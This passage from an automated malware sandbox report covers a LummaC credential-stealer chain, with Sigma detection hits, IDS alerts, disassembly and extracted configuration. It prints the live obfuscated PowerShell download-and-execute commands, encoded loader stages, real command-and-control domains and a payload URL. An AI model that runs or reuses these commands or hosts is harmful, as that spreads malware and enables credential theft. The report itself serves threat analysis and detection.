UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7604, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))" , ProcessId: 7700, ProcessName: powershell.exe
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\system32\cmd.exe" /k start powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A;. $env:Temp\a.ps1; function KyGYrUUD(){function ezpCMdhGQ($rHPeb){if(!(Test-Path -Path $ThBEXpiVO)){curl (KFbC $rHPeb) -o $ThBEXpiVO}}}KyGYrUUD;", CommandLine: "C:\Windows\system32\cmd.exe" /k start powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A;. $env:Temp\a.ps1; function KyGYrUUD(){function ezpCMdhGQ($rHPeb){if(!(Test-Path -Path $ThBEXpiVO)){curl (KFbC $rHPeb) -o $ThBEXpiVO}}}KyGYrUUD;", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ep Unrestricted -w 1 sc $env:Temp\a.ps1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gS0ZiQygkS3lHWXJVVUQpew0KKCgkS3lHWXJVVUQgLXNwbGl0ICcoPzw9XEcuLiknfCV7JEVKdXAuU3ViU3RyaW5nKDMsMTAwKVskX119KSAgLWpvaW4gJycgLXJlcGxhY2UgIi4kIil9OyRFSnVwID0naWV4bXZ7dU4xaUtGZSJBT0V1Vnk1Im9ZezZQbFBhLzphYjRJWi5PYjJxLTdXO0NkSFxneFF3L016SkFqcnQzQDZCfUROJX5UblUofTBRc3NfaCVoSWZrKWM5WEw4NCNAUnlTKm9HcDY1MDk1ODM0NDEwOTM2NDMyNDA2MDk2OTU4Jw==')));cmd.exe /k start powershell -w 1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtZW5jIFV3QjBBR0VBY2dCMEFDMEFVQUJ5QUc4QVl3QmxBSE1BY3dBZ0FDSUFRd0E2QUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUZNQWVRQnpBRmNBYndCM0FEWUFOQUJjQUZjQWFRQnVBR1FBYndCM0FITUFVQUJ2QUhjQVpRQnlBRk1BYUFCbEFHd0FiQUJjQUhZQU1RQXVBREFBWEFCd0FHOEFkd0JsQUhJQWN3Qm9BR1VBYkFCc0FDNEFaUUI0QUdVQUlnQWdBQzBBUVFCeUFHY0FkUUJ0QUdVQWJnQjBBRXdBYVFCekFIUUFJQUFpQUMwQWR3QWdBR2dBYVFCa0FHUUFaUUJ1QUNBQUxRQmxBSEFBSUFCaUFIa0FjQUJoQUhN
                Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe", CommandLine: "C:\Users\user~1\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, ParentCommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7508, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe", ProcessId: 6680, ProcessName: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ep Unrestricted -w 1 sc $env:Temp\a.ps1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gS0ZiQygkS3lHWXJVVUQpew0KKCgkS3lHWXJVVUQgLXNwbGl0ICcoPzw9XEcuLiknfCV7JEVKdXAuU3ViU3RyaW5nKDMsMTAwKVskX119KSAgLWpvaW4gJycgLXJlcGxhY2UgIi4kIil9OyRFSnVwID0naWV4bXZ7dU4xaUtGZSJBT0V1Vnk1Im9ZezZQbFBhLzphYjRJWi5PYjJxLTdXO0NkSFxneFF3L016SkFqcnQzQDZCfUROJX5UblUofTBRc3NfaCVoSWZrKWM5WEw4NCNAUnlTKm9HcDY1MDk1ODM0NDEwOTM2NDMyNDA2MDk2OTU4Jw==')));cmd.exe /k start powershell -w 1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtZW5jIFV3QjBBR0VBY2dCMEFDMEFVQUJ5QUc4QVl3QmxBSE1BY3dBZ0FDSUFRd0E2QUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUZNQWVRQnpBRmNBYndCM0FEWUFOQUJjQUZjQWFRQnVBR1FBYndCM0FITUFVQUJ2QUhjQVpRQnlBRk1BYUFCbEFHd0FiQUJjQUhZQU1RQXVBREFBWEFCd0FHOEFkd0JsQUhJQWN3Qm9BR1VBYkFCc0FDNEFaUUI0QUdVQUlnQWdBQzBBUVFCeUFHY0FkUUJ0QUdVQWJnQjBBRXdBYVFCekFIUUFJQUFpQUMwQWR3QWdBR2dBYVFCa0FHUUFaUUJ1QUNBQUxRQmxBSEFBSUFCaUFIa0FjQUJoQUhNQWN3QWdBQzBBYmdCdkFIQUFJQUF0QUVNQWJ3QnRBRzBBWVFCdUFHUUFJQUJnQUNJQWFRQmxBSGdBSUFBb0FDZ0FUZ0JsQUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCREFHd0FhUUJsQUc0QWRBQXBBQzRBUkFCdkFIY0FiZ0JzQUc4QVlRQmtBRk1BZEFCeUFHa0FiZ0JuQUNnQUp3Qm9BSFFBZEFCd0FITUFPZ0F2QUM4QWR3QmxBR0lBTGdCckFHd0FhUUJ3QUdRQWVRQjNBRzhBZWdCcEFIa0FMZ0J6QUdnQWJ3QndBQzhBYXdCMUFHNEFiZ0JoQUhJQUxnQndBRzRBWndBbkFDa0FLUUJnQUNJQUlnQWdBQzBBVndCcEFHNEFaQUJ2QUhjQVV3QjBBSGtBYkFCbEFDQUFTQUJwQUdRQVpBQmxBRzRBOy4gJGVudjpUZW1wXGEucHMxOyBmdW5jdGlvbiBLeUdZclVVRCgpe2Z1bmN0aW9uIGV6cENNZGhHUSgkckhQZWIpe2lmKCEoVGVzdC1QYXRoIC1QYXRoICRUaEJFWHBpVk8pKXtjdXJsIChLRmJDICRySFBlYikgLW8gJFRoQkVYcGlWT319fUt5R1lyVVVEOw=='))), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ep Unrestricted -w 1 sc $env:Temp\a.ps1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gS0ZiQygkS3lHWXJVVUQpew0KKCgkS3lHWXJVVUQgLXNwbGl0ICcoPzw9XEcuLiknfCV7JEVKdXAuU3ViU3RyaW5nKDMsMTAwKVskX119KSAgLWpvaW4gJycgLXJlcGxhY2UgIi4kIil9OyRFSnVwID0naWV4bXZ7dU4xaUtGZSJBT0V1Vnk1Im9ZezZQbFBhLzphYjRJWi5PYjJxLTdXO0NkSFxneFF3L016SkFqcnQzQDZCfUROJX5UblUofTBRc3NfaCVoSWZrKWM5WEw4NCNAUnlTKm9HcDY1MDk1ODM0NDEwOTM2NDMyNDA2MDk2OTU4Jw==')));cmd.exe /k start powershell -w 1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtZW5jIFV3QjBBR0VBY2dCMEFDMEFVQUJ5QUc4QVl3QmxBSE1BY3dBZ0FDSUFRd0E2QUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUZNQWVRQnpBRmNBYndCM0FEWUFOQUJjQUZjQWFRQnVBR1FBYndCM0FITUFVQUJ2QUhjQVpRQnlBRk1BYUFCbEFHd0FiQUJjQUhZQU1RQXVBREFBWEFCd0FHOEFkd0JsQUhJQWN3Qm9BR1VBYkFCc0FDNEFaUUI0QUdVQUlnQWdBQzBBUVFCeUFHY0FkUUJ0QUdVQWJnQjBBRXdBYVFCekFIUUFJQUFpQUMwQWR3QWdBR2dBYVFCa0FHUUFaUUJ1QUNBQUxRQmxBSEFBSUFCaUFIa0FjQUJoQUhNQWN3QWdBQzBBYmdCdkFIQUFJQUF0QUVNQWJ3QnRBRzBBWVFCdUFHUUFJQUJnQUNJQWFRQmxBSGdBSUFBb0FDZ0FUZ0JsQUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCREFHd0FhUUJsQUc0QWRBQXBBQzRBUkFC
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7324, TargetFilename: C:\Users\user\AppData\Local\Temp\a.ps1

                Data Obfuscation

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))" , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7604, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))" , ProcessId: 7700, ProcessName: powershell.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-08T13:56:33.726180+010020283713Unknown Traffic192.168.2.749977104.21.112.1443TCP
                2025-01-08T13:56:34.665709+010020283713Unknown Traffic192.168.2.749978104.21.112.1443TCP
                2025-01-08T13:56:35.840011+010020283713Unknown Traffic192.168.2.749979104.21.112.1443TCP
                2025-01-08T13:56:37.183158+010020283713Unknown Traffic192.168.2.749980104.21.112.1443TCP
                2025-01-08T13:56:38.231975+010020283713Unknown Traffic192.168.2.749981104.21.112.1443TCP
                2025-01-08T13:56:39.557861+010020283713Unknown Traffic192.168.2.749982104.21.112.1443TCP
                2025-01-08T13:56:40.808788+010020283713Unknown Traffic192.168.2.749983104.21.112.1443TCP
                2025-01-08T13:56:42.999576+010020283713Unknown Traffic192.168.2.749984104.21.112.1443TCP
                2025-01-08T13:56:44.401211+010020283713Unknown Traffic192.168.2.749985192.250.235.30443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-08T13:56:34.172790+010020546531A Network Trojan was detected192.168.2.749977104.21.112.1443TCP
                2025-01-08T13:56:35.165753+010020546531A Network Trojan was detected192.168.2.749978104.21.112.1443TCP
                2025-01-08T13:56:43.462643+010020546531A Network Trojan was detected192.168.2.749984104.21.112.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-08T13:56:34.172790+010020498361A Network Trojan was detected192.168.2.749977104.21.112.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-08T13:56:35.165753+010020498121A Network Trojan was detected192.168.2.749978104.21.112.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-08T13:56:36.678110+010020480941Malware Command and Control Activity Detected192.168.2.749979104.21.112.1443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: crowdwarek.shopAvira URL Cloud: Label: malware
                Source: robinsharez.shopAvira URL Cloud: Label: malware
                Source: versersleep.shopAvira URL Cloud: Label: malware
                Source: https://bigadcompany.com/Assaac.exeAvira URL Cloud: Label: malware
                Source: femalsabler.shopAvira URL Cloud: Label: malware
                Source: soundtappysk.shopAvira URL Cloud: Label: malware
                Source: apporholis.shopAvira URL Cloud: Label: malware
                Source: handscreamny.shopAvira URL Cloud: Label: malware
                Source: chipdonkeruz.shopAvira URL Cloud: Label: malware
                Source: 19.2.powershell.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["femalsabler.shop", "soundtappysk.shop", "quinceisoz.cam", "versersleep.shop", "robinsharez.shop", "apporholis.shop", "handscreamny.shop", "crowdwarek.shop", "chipdonkeruz.shop"], "Build id": "WG6I6S--web55"}
                Source: C:\Users\user\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exeReversingLabs: Detection: 42%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
                Source: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: robinsharez.shop
                Source: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: handscreamny.shop
                Source: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: chipdonkeruz.shop
                Source: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: versersleep.shop
                Source: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: crowdwarek.shop
                Source: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: apporholis.shop
                Source: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: femalsabler.shop
                Source: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: soundtappysk.shop
                Source: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: quinceisoz.cam
                Source: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000013.00000002.3691471857.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: WG6I6S--web55
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00418E87 CryptUnprotectData,19_2_00418E87
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49977 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49978 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49979 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49980 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49981 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49982 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49983 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49984 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 192.250.235.30:443 -> 192.168.2.7:49985 version: TLS 1.2
                Source: Binary string: C:\Users\Kernel32\Desktop\ki_to_ki\Assaac\obj\x64\Release\Assaac.pdb source: 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe, 00000014.00000000.2302983309.0000026A56552000.00000002.00000001.01000000.0000000E.sdmp, 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe.19.dr
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 08063D99h13_2_08063C8A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 08078EFFh13_2_08078DBC
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 080763BDh13_2_08076029
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 080763BDh13_2_08076038
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 08078EFFh13_2_08078E3F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 080767EEh13_2_08076778
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp 080767EEh13_2_08076788
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push C241818Eh19_2_0040A011
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax19_2_0040C083
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax19_2_0043B120
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax19_2_0040B290
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx-000000DAh]19_2_004220E0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp ecx19_2_00427097
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [ecx], dl19_2_0042B141
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp ecx19_2_0042B141
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, ebx19_2_0041C910
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp byte ptr [esi+eax], 00000000h19_2_0042D120
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then test esi, esi19_2_0043C130
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx eax, byte ptr [ecx]19_2_0043E980
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov dword ptr [esi], FFFFFFFFh19_2_00402250
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edi], bl19_2_00409270
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push eax19_2_0041F2D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+edx-000000DCh]19_2_0041F2D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [edx]19_2_00438AD0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+16F4F336h]19_2_00441280
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax19_2_00428B65
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ecx19_2_00425310
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edi, ecx19_2_00426BC6
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-1Dh]19_2_004283D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+16F4F336h]19_2_00441380
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [esi], cx19_2_00414B90
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, eax19_2_00405BA0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebp, eax19_2_00405BA0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp ecx19_2_0042A3B3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax-14D01ED7h]19_2_0041CC59
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp ecx19_2_00426C1B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp ecx19_2_0042A430
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [esi], al19_2_0042ECEF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]19_2_0042BC80
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx+17h]19_2_00409540
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp ecx19_2_00441540
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [esi], al19_2_0042ECED
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx eax, byte ptr [ecx]19_2_0040ADC0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-1E2B6BFEh]19_2_0040ADC0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp ecx19_2_004415D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+0Eh]19_2_00416DBD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then lea ecx, dword ptr [edx+13h]19_2_00441660
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp ecx19_2_00441660
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp ecx19_2_00429E70
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h19_2_00441E70
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 27BE92A4h19_2_00441E70
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov esi, ecx19_2_00425600
